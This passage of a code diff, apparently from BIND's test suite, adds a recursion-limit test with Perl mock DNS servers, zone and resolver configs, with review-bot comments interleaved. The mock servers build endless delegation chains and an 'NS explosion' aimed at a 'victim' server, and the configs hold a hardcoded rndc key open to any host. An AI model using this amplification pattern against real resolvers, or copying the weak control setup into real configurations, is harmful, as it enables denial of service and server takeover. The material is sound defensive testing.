+$CLEANQL +$RNDCCMD 10.53.0.6 flush +$DIG $DIGOPTS @10.53.0.6 txt a.b.stale. 
> dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*hooray" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR ns.b.stale. +ADDR ns2.stale. +NS b.stale. +NS stale. +__EOF +test -f ans3/query.log && ret=1 +sort ans4/query.log > ans4/query.log.sorted +cat << __EOF | $DIFF ans4/query.log.sorted - > /dev/null || ret=1 +ADDR ns.b.stale. +NS b.stale. +TXT a.b.stale. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .stale is properly minimized when qname-minimization is in relaxed mode ($n)" +ret=0 +$CLEANQL +$RNDCCMD 10.53.0.7 flush +$DIG $DIGOPTS @10.53.0.7 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*hooray" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.b.stale. +ADDR ns.b.stale. +ADDR ns2.stale. +__EOF +test -f ans3/query.log && ret=1 +sort ans4/query.log > ans4/query.log.sorted +cat << __EOF | $DIFF ans4/query.log.sorted - > /dev/null || ret=1 +ADDR ns.b.stale. +TXT a.b.stale. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sleep 2, allow entries in cache to go stale" +sleep 2 + +n=$((n+1)) +echo_i "query for .stale is not minimized when qname-minimization is off (stale cache) ($n)" +ret=0 +$CLEANQL +$DIG $DIGOPTS @10.53.0.5 txt a.b.stale. 
> dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*peekaboo" dig.out.test$n > /dev/null || ret=1 +sleep 1 +echo "TXT a.b.stale." | $DIFF ans2/query.log - > /dev/null || ret=1 +echo "TXT a.b.stale." | $DIFF ans3/query.log - > /dev/null || ret=1 +test -f ans4/query.log && ret=1 +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .stale is properly minimized when qname-minimization is in strict mode (stale cache) ($n)" +ret=0 +$CLEANQL +$DIG $DIGOPTS @10.53.0.6 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*hooray" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +NS b.stale. +NS stale. +__EOF +test -f ans3/query.log && ret=1 +sort ans4/query.log > ans4/query.log.sorted +cat << __EOF | $DIFF ans4/query.log.sorted - > /dev/null || ret=1 +NS b.stale. +TXT a.b.stale. +__EOF +for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "query for .stale is properly minimized when qname-minimization is in relaxed mode (stale cache) ($n)" +ret=0 +$CLEANQL +$DIG $DIGOPTS @10.53.0.7 txt a.b.stale. > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "a\.b\.stale\..*1.*IN.*TXT.*hooray" dig.out.test$n > /dev/null || ret=1 +sleep 1 +sort ans2/query.log > ans2/query.log.sorted +cat << __EOF | $DIFF ans2/query.log.sorted - > /dev/null || ret=1 +ADDR _.b.stale. +__EOF +test -f ans3/query.log && ret=1 +sort ans4/query.log > ans4/query.log.sorted +cat << __EOF | $DIFF ans4/query.log.sorted - > /dev/null || ret=1 +TXT a.b.stale. 
+__EOF
+for ans in ans2 ans3 ans4; do mv -f $ans/query.log query-$ans-$n.log 2>/dev/null || true; done
+if [ $ret != 0 ]; then echo_i "failed"; fi
+status=$((status+ret))
+
+echo_i "exit status: $status"
+[ $status -eq 0 ] || exit 1
diff --git a/bin/tests/system/reclimit/README b/bin/tests/system/reclimit/README
new file mode 100644
index 0000000..e474907
--- /dev/null
+++ b/bin/tests/system/reclimit/README
@@ -0,0 +1,19 @@
+Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+
+SPDX-License-Identifier: MPL-2.0
+
+This Source Code Form is subject to the terms of the Mozilla Public
+License, v. 2.0. If a copy of the MPL was not distributed with this
+file, you can obtain one at https://mozilla.org/MPL/2.0/.
+
+See the COPYRIGHT file distributed with this work for additional
+information regarding copyright ownership.
+
+system test for recursion limits
+
+ns1 -- root server
+ans2 -- for example.org: delegate to ns1.(n+1).example.org for all n, up to the
+ value specified in ans.limit (or forever if limit is 0)
+ns3 -- resolver under test
+ans4 -- for ns*.example.com: return address records.
+ans7 -- "victim" server
diff --git a/bin/tests/system/reclimit/ans2/ans.pl b/bin/tests/system/reclimit/ans2/ans.pl
new file mode 100644
index 0000000..4576951
--- /dev/null
+++ b/bin/tests/system/reclimit/ans2/ans.pl
@@ -0,0 +1,235 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use IO::Socket; +use Net::DNS; + +my $localaddr = "10.53.0.2"; +my $limit = getlimit(); +my $no_more_waiting = 0; +my @delayed_response; +my $timeout; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$localaddr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $count = 0; +my $send_response = 0; + +sub getlimit { + if ( -e "ans.limit") { + open(FH, "<", "ans.limit"); + my $line = <FH>; + chomp $line; + close FH; + if ($line =~ /^\d+$/) { + return $line; + } + } + + return 0; +} + +# If $wait == 0 is returned, returned reply will be sent immediately. +# If $wait == 1 is returned, sending the returned reply might be delayed; see +# comments inside handle_UDP() for details. 
+sub reply_handler { + my ($qname, $qclass, $qtype) = @_; + my ($rcode, @ans, @auth, @add, $wait); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + $wait = 0; + $count += 1; + + if ($qname eq "count" ) { + if ($qtype eq "TXT") { + my ($ttl, $rdata) = (0, "$count"); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\tcount: $count\n"); + } + $rcode = "NOERROR"; + } elsif ($qname eq "reset" ) { + $count = 0; + $send_response = 0; + $limit = getlimit(); + $rcode = "NOERROR"; + print ("\tlimit: $limit\n"); + } elsif ($qname eq "direct.example.org" ) { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname eq "indirect1.example.org" || + $qname eq "indirect2.example.org" || + $qname eq "indirect3.example.org" || + $qname eq "indirect4.example.org" || + $qname eq "indirect5.example.org" || + $qname eq "indirect6.example.org" || + $qname eq "indirect7.example.org" || + $qname eq "indirect8.example.org") { + if (! $send_response) { + my $rr = new Net::DNS::RR("$qname 86400 $qclass NS ns1.1.example.org"); + push @auth, $rr; + } elsif ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + } + $rcode = "NOERROR"; + } elsif ($qname =~ /^ns1\.(\d+)\.example\.org$/) { + my $next = $1 + 1; + $wait = 1; + if ($limit == 0 || (! 
$send_response && $next <= $limit)) { + my $rr = new Net::DNS::RR("$1.example.org 86400 $qclass NS ns1.$next.example.org"); + push @auth, $rr; + } else { + $send_response = 1; + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, "10.53.0.4"); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + print("\tresponse: $qname $ttl $qclass $qtype $rdata\n"); + push @ans, $rr; + } + } + $rcode = "NOERROR"; + } elsif ($qname eq "direct.example.net" ) { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + } + $rcode = "NOERROR"; + } elsif( $qname =~ /^ns1\.(\d+)\.example\.net$/ ) { + my $next = ($1 + 1) * 16; + for (my $i = 1; $i < 16; $i++) { + my $s = $next + $i; + my $rr = new Net::DNS::RR("$1.example.net 86400 $qclass NS ns1.$s.example.net"); + push @auth, $rr; + $rr = new Net::DNS::RR("ns1.$s.example.net 86400 $qclass A 10.53.0.7"); + push @add, $rr; + } + $rcode = "NOERROR"; + } else { + $rcode = "NXDOMAIN"; + } + + return ($rcode, \@ans, \@auth, \@add, $wait); +} + +sub handleUDP { + my ($buf, $peer) = @_; + my ($request, $rcode, $ans, $auth, $add, $wait); + + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + + my ($question) = $request->question; + my $qname = $question->qname; + my $qclass = $question->qclass; + my $qtype = $question->qtype; + + ($rcode, $ans, $auth, $add, $wait) = reply_handler($qname, $qclass, $qtype); + + my $reply = $request->reply(); + + $reply->header->rcode($rcode); + $reply->header->aa(@$ans ? 1 : 0); + $reply->header->id($request->header->id); + $reply->{answer} = $ans if $ans; + $reply->{authority} = $auth if $auth; + $reply->{additional} = $add if $add; + + if ($wait) { + # reply_handler() asked us to delay sending this reply until + # another reply with $wait == 1 is generated or a timeout + # occurs. 
+ if (@delayed_response) { + # A delayed reply is already queued, so we can now send + # both the delayed reply and the current reply. + send_delayed_response(); + return $reply; + } elsif ($no_more_waiting) { + # It was determined before that there is no point in + # waiting for "accompanying" queries. Thus, send the + # current reply immediately. + return $reply; + } else { + # No delayed reply is queued and the client is expected + # to send an "accompanying" query shortly. Do not send + # the current reply right now, just save it for later + # and wait for an "accompanying" query to be received. + @delayed_response = ($reply, $peer); + $timeout = 0.5; + return; + } + } else { + # Send reply immediately. + return $reply; + } +} + +sub send_delayed_response { + my ($reply, $peer) = @delayed_response; + # Truncation to 512 bytes is required for triggering "NS explosion" on + # builds without IPv6 support + $udpsock->send($reply->data(512), 0, $peer); + undef @delayed_response; + undef $timeout; +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, $timeout); + + if (vec($rout, fileno($udpsock), 1)) { + my ($buf, $peer, $reply); + $udpsock->recv($buf, 512); + $peer = $udpsock->peername(); + $reply = handleUDP($buf, $peer); + # Truncation to 512 bytes is required for triggering "NS + # explosion" on builds without IPv6 support + $udpsock->send($reply->data(512), 0, $peer) if $reply; + } else { + # An "accompanying" query was expected to come in, but did not. + # Assume the client never sends "accompanying" queries to + # prevent pointlessly waiting for them ever again. + $no_more_waiting = 1; + # Send the delayed reply to the query which caused us to wait. + send_delayed_response(); + } +} diff --git a/bin/tests/system/reclimit/ans4/ans.pl b/bin/tests/system/reclimit/ans4/ans.pl new file mode 100644 index 0000000..d5002aa --- /dev/null +++ b/bin/tests/system/reclimit/ans4/ans.pl 
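Review bot: `getlimit()` opens `ans.limit` without checking the result, so a file that exists but cannot be read falls through to `return 0`, and the `ns1.N.example.org` branch of `reply_handler` treats `$limit == 0` as "delegate forever" — a read failure silently turns the bounded test into the unbounded one. The pid-file code at the top of the script already dies on I/O errors; doing the same here, `open(my $fh, "<", "ans.limit") or die "cannot open ans.limit: $!";`, keeps the fixture's behaviour explicit and drops the bareword `FH` handle. The same `getlimit()` is copied into ans4/ans.pl. Separately, the comment before `reply_handler` refers to `handle_UDP()` while the sub is named `handleUDP`.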
@@ -0,0 +1,240 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +use strict; +use warnings; + +use IO::File; +use IO::Socket; +use Net::DNS; + +my $localaddr = "10.53.0.4"; +my $limit = getlimit(); +my $no_more_waiting = 0; +my @delayed_response; +my $timeout; + +my $localport = int($ENV{'PORT'}); +if (!$localport) { $localport = 5300; } + +my $udpsock = IO::Socket::INET->new(LocalAddr => "$localaddr", + LocalPort => $localport, Proto => "udp", Reuse => 1) or die "$!"; + +my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!"; +print $pidf "$$\n" or die "cannot write pid file: $!"; +$pidf->close or die "cannot close pid file: $!"; +sub rmpid { unlink "ans.pid"; exit 1; }; + +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +my $count = 0; +my $send_response = 1; + +sub getlimit { + if ( -e "ans.limit") { + open(FH, "<", "ans.limit"); + my $line = <FH>; + chomp $line; + close FH; + if ($line =~ /^\d+$/) { + return $line; + } + } + + return 0; +} + +# If $wait == 0 is returned, returned reply will be sent immediately. +# If $wait == 1 is returned, sending the returned reply might be delayed; see +# comments inside handle_UDP() for details. 
+sub reply_handler { + my ($qname, $qclass, $qtype) = @_; + my ($rcode, @ans, @auth, @add, $wait); + + print ("request: $qname/$qtype\n"); + STDOUT->flush(); + + $wait = 0; + $count += 1; + + if ($qname eq "count" ) { + if ($qtype eq "TXT") { + my ($ttl, $rdata) = (0, "$count"); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\tcount: $count\n"); + } + $rcode = "NOERROR"; + } elsif ($qname eq "reset" ) { + $count = 0; + $send_response = 1; + $limit = getlimit(); + $rcode = "NOERROR"; + print ("\tlimit: $limit\n"); + } elsif ($qname eq "direct.example.org" ) { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\twait=$wait ans: $qname $ttl $qclass $qtype $rdata\n"); + } + $rcode = "NOERROR"; + } elsif ($qname eq "indirect1.example.org" || + $qname eq "indirect2.example.org" || + $qname eq "indirect3.example.org" || + $qname eq "indirect4.example.org" || + $qname eq "indirect5.example.org" || + $qname eq "indirect6.example.org" || + $qname eq "indirect7.example.org" || + $qname eq "indirect8.example.org") { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\twait=$wait ans: $qname $ttl $qclass $qtype $rdata\n"); + } + $rcode = "NOERROR"; + } elsif ($qname =~ /^ns1\.(\d+)\.example\.org$/) { + my $next = $1 + 1; + $wait = 1; + if ($limit == 0) { + my $rr = new Net::DNS::RR("$1.example.org 86400 $qclass NS ns1.$next.example.org"); + push @auth, $rr; + print ("\twait=$wait auth: $1.example.org 86400 $qclass NS ns1.$next.example.org\n"); + } else { + $send_response = 1; + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + print("\tresponse: $qname $ttl $qclass $qtype $rdata\n"); + push @ans, $rr; + } + } + $rcode = "NOERROR"; + } elsif 
($qname eq "direct.example.net" ) { + if ($qtype eq "A") { + my ($ttl, $rdata) = (3600, $localaddr); + my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata"); + push @ans, $rr; + print ("\twait=$wait ans: $qname $ttl $qclass $qtype $rdata\n"); + } + $rcode = "NOERROR"; + } elsif( $qname =~ /^ns1\.(\d+)\.example\.net$/ ) { + my $next = ($1 + 1) * 16; + for (my $i = 1; $i < 16; $i++) { + my $s = $next + $i; + my $rr = new Net::DNS::RR("$1.example.net 86400 $qclass NS ns1.$s.example.net"); + push @auth, $rr; + print ("\twait=$wait auth: $1.example.net 86400 $qclass NS ns1.$s.example.net\n"); + $rr = new Net::DNS::RR("ns1.$s.example.net 86400 $qclass A 10.53.0.7"); + print ("\twait=$wait add: ns1.$s.example.net 86400 $qclass A 10.53.0.7\n"); + push @add, $rr; + } + $rcode = "NOERROR"; + } else { + $rcode = "NXDOMAIN"; + print ("\twait=$wait NXDOMAIN\n"); + } + + return ($rcode, \@ans, \@auth, \@add, $wait); +} + +sub handleUDP { + my ($buf, $peer) = @_; + my ($request, $rcode, $ans, $auth, $add, $wait); + + $request = new Net::DNS::Packet(\$buf, 0); + $@ and die $@; + + my ($question) = $request->question; + my $qname = $question->qname; + my $qclass = $question->qclass; + my $qtype = $question->qtype; + + ($rcode, $ans, $auth, $add, $wait) = reply_handler($qname, $qclass, $qtype); + + my $reply = $request->reply(); + + $reply->header->rcode($rcode); + $reply->header->aa(@$ans ? 1 : 0); + $reply->header->id($request->header->id); + $reply->{answer} = $ans if $ans; + $reply->{authority} = $auth if $auth; + $reply->{additional} = $add if $add; + + if ($wait) { + # reply_handler() asked us to delay sending this reply until + # another reply with $wait == 1 is generated or a timeout + # occurs. + if (@delayed_response) { + # A delayed reply is already queued, so we can now send + # both the delayed reply and the current reply. 
+ send_delayed_response(); + return $reply; + } elsif ($no_more_waiting) { + # It was determined before that there is no point in + # waiting for "accompanying" queries. Thus, send the + # current reply immediately. + return $reply; + } else { + # No delayed reply is queued and the client is expected + # to send an "accompanying" query shortly. Do not send + # the current reply right now, just save it for later + # and wait for an "accompanying" query to be received. + @delayed_response = ($reply, $peer); + $timeout = 0.5; + return; + } + } else { + # Send reply immediately. + return $reply; + } +} + +sub send_delayed_response { + my ($reply, $peer) = @delayed_response; + # Truncation to 512 bytes is required for triggering "NS explosion" on + # builds without IPv6 support + $udpsock->send($reply->data(512), 0, $peer); + undef @delayed_response; + undef $timeout; + print ("send_delayed_response\n"); +} + +# Main +my $rin; +my $rout; +for (;;) { + $rin = ''; + vec($rin, fileno($udpsock), 1) = 1; + + select($rout = $rin, undef, undef, $timeout); + + if (vec($rout, fileno($udpsock), 1)) { + my ($buf, $peer, $reply); + $udpsock->recv($buf, 512); + $peer = $udpsock->peername(); + $reply = handleUDP($buf, $peer); + # Truncation to 512 bytes is required for triggering "NS + # explosion" on builds without IPv6 support + $udpsock->send($reply->data(512), 0, $peer) if $reply; + } else { + # An "accompanying" query was expected to come in, but did not. + # Assume the client never sends "accompanying" queries to + # prevent pointlessly waiting for them ever again. + $no_more_waiting = 1; + # Send the delayed reply to the query which caused us to wait. + send_delayed_response(); + } +} diff --git a/bin/tests/system/reclimit/ans7/ans.pl b/bin/tests/system/reclimit/ans7/ans.pl new file mode 100644 index 0000000..41a44a6 --- /dev/null +++ b/bin/tests/system/reclimit/ans7/ans.pl 
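Review bot: `$send_response` is never read in this file: it is initialised to 1, set to 1 again on `reset` and in the `else` arm of the `ns1.N.example.org` branch, but no condition tests it (ans2/ans.pl does, in its `indirect*` and `ns1.*` branches). Either remove the variable or add a comment saying it is kept only to mirror ans2, so a reader does not look for behaviour that depends on it. The README describes ans4 as answering for `ns*.example.com`, while every pattern in `reply_handler` here matches `example.org` or `example.net`; one of the two probably needs updating.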
@@ -0,0 +1,76 @@
+#!/usr/bin/env perl
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+use strict;
+use warnings;
+
+use IO::File;
+use Getopt::Long;
+use Net::DNS::Nameserver;
+
+my $pidf = new IO::File "ans.pid", "w" or die "cannot open pid file: $!";
+print $pidf "$$\n" or die "cannot write pid file: $!";
+$pidf->close or die "cannot close pid file: $!";
+sub rmpid { unlink "ans.pid"; exit 1; };
+
+$SIG{INT} = \&rmpid;
+$SIG{TERM} = \&rmpid;
+
+my $count = 0;
+
+my $localaddr = "10.53.0.7";
+my $localport = int($ENV{'PORT'});
+if (!$localport) { $localport = 5300; }
+my $verbose = 0;
+
+sub reply_handler {
+ my ($qname, $qclass, $qtype, $peerhost, $query, $conn) = @_;
+ my ($rcode, @ans, @auth, @add);
+
+ print ("request: $qname/$qtype\n");
+ STDOUT->flush();
+
+ $count += 1;
+
+ if ($qname eq "count" ) {
+ if ($qtype eq "TXT") {
+ my ($ttl, $rdata) = (0, "$count");
+ my $rr = new Net::DNS::RR("$qname $ttl $qclass $qtype $rdata");
+ push @ans, $rr;
+ print ("\tcount: $count\n");
+ }
+ $rcode = "NOERROR";
+ } elsif ($qname eq "reset") {
+ $count = 0;
+ $rcode = "NOERROR";
+ } else {
+ $rcode = "REFUSED";
+ }
+
+ # mark the answer as authoritative (by setting the 'aa' flag
+ return ($rcode, \@ans, \@auth, \@add, { aa => 1 });
+}
+
+GetOptions(
+ 'port=i' => \$localport,
+ 'verbose!' => \$verbose,
+);
+
+my $ns = Net::DNS::Nameserver->new(
+ LocalAddr => $localaddr,
+ LocalPort => $localport,
+ ReplyHandler => \&reply_handler,
+ Verbose => $verbose,
+);
+
+$ns->main_loop;
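Review bot: `$count += 1` runs before the `count`/`reset` checks in `reply_handler`, so the TXT value returned for `count` includes the `count` query itself. Since the README calls this server the "victim" whose query volume the test measures, the handler should say so, e.g. `# NOTE: the counter includes the "count" query itself` above the increment; presumably tests.sh (not part of this hunk) already allows for the extra one. The comment above the `return` is also missing its closing parenthesis: `# mark the answer as authoritative (by setting the 'aa' flag)`.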
diff --git a/bin/tests/system/reclimit/clean.sh b/bin/tests/system/reclimit/clean.sh
new file mode 100644
index 0000000..0a92f90
--- /dev/null
+++ b/bin/tests/system/reclimit/clean.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+rm -f dig.out*
+rm -f ans?/ans.run
+rm -f ans2/ans.limit
+rm -f ans4/ans.limit
+rm -f ns?/named.memstats
+rm -f ns?/named.run
+rm -f ns*/named.conf
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/reclimit/ns1/named.conf.in b/bin/tests/system/reclimit/ns1/named.conf.in
new file mode 100644
index 0000000..63cb706
--- /dev/null
+++ b/bin/tests/system/reclimit/ns1/named.conf.in
@@ -0,0 +1,27 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ query-source address 10.53.0.1;
+ notify-source 10.53.0.1;
+ transfer-source 10.53.0.1;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.1; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "." { type primary; file "root.db"; };
diff --git a/bin/tests/system/reclimit/ns1/root.db b/bin/tests/system/reclimit/ns1/root.db
new file mode 100644
index 0000000..412715c
--- /dev/null
+++ b/bin/tests/system/reclimit/ns1/root.db
@@ -0,0 +1,21 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 60 IN SOA ns.nil. hostmaster.ns.nil. 1 0 0 0 0
+. 60 IN NS ns.nil.
+ns.nil. 60 IN A 10.53.0.1
+ns.tld1. 60 IN A 10.53.0.1
+example.org. 60 IN NS direct.example.org.
+direct.example.org. 60 IN A 10.53.0.2
+example.net. 60 IN NS direct.example.net.
+direct.example.net. 60 IN A 10.53.0.2
+example.com. 60 IN NS direct.example.com.
+direct.example.com. 60 IN A 10.53.0.4
diff --git a/bin/tests/system/reclimit/ns3/hints.db b/bin/tests/system/reclimit/ns3/hints.db
new file mode 100644
index 0000000..c9264bf
--- /dev/null
+++ b/bin/tests/system/reclimit/ns3/hints.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+. 60 IN NS ns.nil.
+ns.nil. 60 IN A 10.53.0.1
diff --git a/bin/tests/system/reclimit/ns3/named1.conf.in b/bin/tests/system/reclimit/ns3/named1.conf.in
new file mode 100644
index 0000000..3eaaf6a
--- /dev/null
+++ b/bin/tests/system/reclimit/ns3/named1.conf.in
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ servfail-ttl 0;
+ qname-minimization disabled;
+ max-recursion-depth 12;
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." { type hint; file "hints.db"; };
diff --git a/bin/tests/system/reclimit/ns3/named2.conf.in b/bin/tests/system/reclimit/ns3/named2.conf.in
new file mode 100644
index 0000000..12bf35f
--- /dev/null
+++ b/bin/tests/system/reclimit/ns3/named2.conf.in
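Review bot: The `controls` statement in named1.conf.in accepts rndc connections from any source (`allow { any; }`) and authenticates them with a short, fixed secret committed here in clear text; named2.conf.in, named3.conf.in and named4.conf.in repeat the same block. That is tolerable only if 10.53.0.3 is a test-only address on the local host, which this diff does not show, so the file should say it, for example `/* test-only rndc key; the control channel must not be reachable off-host */` above `key rndc_key`, so the block is not copied into a real configuration. If the harness always connects from the 10.53.0.x test addresses, narrowing the ACL to them would be a cheap extra guard.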
@@ -0,0 +1,39 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ directory ".";
+ query-source address 10.53.0.3;
+ notify-source 10.53.0.3;
+ transfer-source 10.53.0.3;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.3; };
+ listen-on-v6 { none; };
+ servfail-ttl 0;
+ qname-minimization disabled;
+ max-recursion-depth 5;
+ recursion yes;
+ dnssec-validation yes;
+};
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
+zone "." { type hint; file "hints.db"; };
diff --git a/bin/tests/system/reclimit/ns3/named3.conf.in b/bin/tests/system/reclimit/ns3/named3.conf.in
new file mode 100644
index 0000000..0910f94
--- /dev/null
+++ b/bin/tests/system/reclimit/ns3/named3.conf.in
@@ -0,0 +1,40 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
